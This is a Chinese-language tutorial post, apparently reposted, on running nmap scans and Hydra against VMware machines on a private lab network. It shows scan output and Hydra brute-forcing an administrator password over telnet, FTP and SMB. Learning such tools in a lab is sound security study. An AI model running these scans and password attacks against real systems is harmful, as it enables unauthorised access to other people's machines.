网络安全学习--nmap与Hydra简单使用
Posted 丢爸
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了网络安全学习--nmap与Hydra简单使用相关的知识,希望对你有一定的参考价值。
扫描技术
手工与工具结合
主机探测:确定目标主机是否存活
常见端口号
| 21 | FTP | 22 | SSH |
| 23 | Telnet | 25 | SMTP |
| 80 | HTTP | 443 | HTTPS |
| 1433 | SQL Server | 1521 | Oracle |
| 3306 | mysql | 3389 | 远程桌面(RDP) |
| -sP | ping 扫描 |
| -p | 指定端口范围 |
| -sV | 服务器版本探测 |
| -O | 启用操作系统探测 |
| -A | 全面扫描 |
| -oN | 保存txt |
#探测10.1.1.0网段有哪些主机在线
C:\\Users\\Administrator>nmap -sP 10.1.1.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:38 ?D1ú±ê×?ê±??
Nmap scan report for 10.1.1.2
Host is up (0.00s latency).
MAC Address: 00:0C:29:F6:15:1A (VMware)
Nmap scan report for 10.1.1.5
Host is up (0.00039s latency).
MAC Address: 00:0C:29:5B:89:83 (VMware)
Nmap scan report for 10.1.1.100
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 7.89 seconds
#启用操作系统探测,查看系统开启的端口
C:\\Users\\Administrator>nmap -O 10.1.1.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:40 ?D1ú±ê×?ê±??
Nmap scan report for 10.1.1.2
Host is up (0.00045s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1028/tcp open unknown
1062/tcp open veracity
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:F6:15:1A (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Nmap scan report for 10.1.1.5
Host is up (0.00057s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
MAC Address: 00:0C:29:5B:89:83 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|8|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
Nmap scan report for 10.1.1.100
Host is up (0.00043s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
902/tcp open iss-realsecure
912/tcp open apex-mesh
1688/tcp open nsjtp-data
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=12/5%OT=135%CT=1%CU=32317%PV=Y%DS=0%DC=L%G=Y%TM=61ACC1
OS:66%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=
OS:S%TS=U)OPS(O1=MFFD7NW8NNS%O2=MFFD7NW8NNS%O3=MFFD7NW8%O4=MFFD7NW8NNS%O5=M
OS:FFD7NW8NNS%O6=MFFD7NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF
OS:70)ECN(R=Y%DF=Y%T=40%W=FFFF%O=MFFD7NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=O%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=Z%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=Z)
Network Distance: 0 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 32.34 seconds
# 查看主机是否打开指定端口
C:\\Users\\Administrator>nmap -p 21,23 10.1.1.2
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:45 ?D1ú±ê×?ê±??
Nmap scan report for 10.1.1.2
Host is up (0.00076s latency).
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
MAC Address: 00:0C:29:F6:15:1A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
#查看服务版本
C:\\Users\\Administrator>nmap -p 21,23 10.1.1.2 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:47 ?D1ú±ê×?ê±??
Nmap scan report for 10.1.1.2
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet Microsoft Windows XP telnetd
MAC Address: 00:0C:29:F6:15:1A (VMware)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
#全面扫描
C:\\Users\\Administrator>nmap -A 10.1.1.2
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:48 ?D1ú±ê×?ê±??
Nmap scan report for 10.1.1.2
Host is up (0.00030s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet Microsoft Windows XP telnetd
| telnet-ntlm-info:
| Target_Name: WIN2003-XDD1
| NetBIOS_Domain_Name: WIN2003-XDD1
| NetBIOS_Computer_Name: WIN2003-XDD1
| DNS_Domain_Name: win2003-xdd1
| DNS_Computer_Name: win2003-xdd1
|_ Product_Version: 5.2.3790
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2003 3790 Service Pack 2 microsoft-ds
1028/tcp open msrpc Microsoft Windows RPC
1062/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:F6:15:1A (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp, cpe:/o:microsoft:windows_server_2003
Host script results:
|_nbstat: NetBIOS name: WIN2003-XDD1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:f6:15:1a (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
| OS CPE: cpe:/o:microsoft:windows_server_2003::sp2
| Computer name: win2003-xdd1
| NetBIOS computer name: WIN2003-XDD1\\x00
| Workgroup: WORKGROUP\\x00
|_ System time: 2021-12-05T21:49:02+08:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: -4h00m00s, deviation: 5h39m23s, median: -8h00m00s
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 10.1.1.2
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.85 seconds
#将扫描信息保存至D盘a文件
C:\\Users\\Administrator>nmap -O 10.1.1.2 -oN d:\\a
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:52 ?D1ú±ê×?ê±??
Nmap scan report for 10.1.1.2
Host is up (0.0011s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1028/tcp open unknown
1062/tcp open veracity
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:F6:15:1A (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
Hydra
# -l username 指定用户 -L File 指定用户文件 -p 指定密码 -P FILE指定密码文件
E:\\SoftWare\\thc-hydra-windows-master>hydra.exe -l administrator -P D:\\pass.txt 10.1.1.2 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-12-05 22:10:18
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service telnet on port 23
[23][telnet] host: 10.1.1.2 login: administrator password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-12-05 22:10:21
E:\\SoftWare\\thc-hydra-windows-master>hydra.exe -l administrator -P D:\\pass.txt 10.1.1.2 ftp
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-12-05 22:11:26
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.1.1.2 login: administrator password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-12-05 22:11:26
# 445 共享服务
E:\\SoftWare\\thc-hydra-windows-master>hydra.exe -l administrator -P D:\\pass.txt 10.1.1.2 smb
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-12-05 22:15:35
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service smb on port 445
[445][smb] host: 10.1.1.2 login: administrator password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-12-05 22:15:36
以上是关于网络安全学习--nmap与Hydra简单使用的主要内容,如果未能解决你的问题,请参考以下文章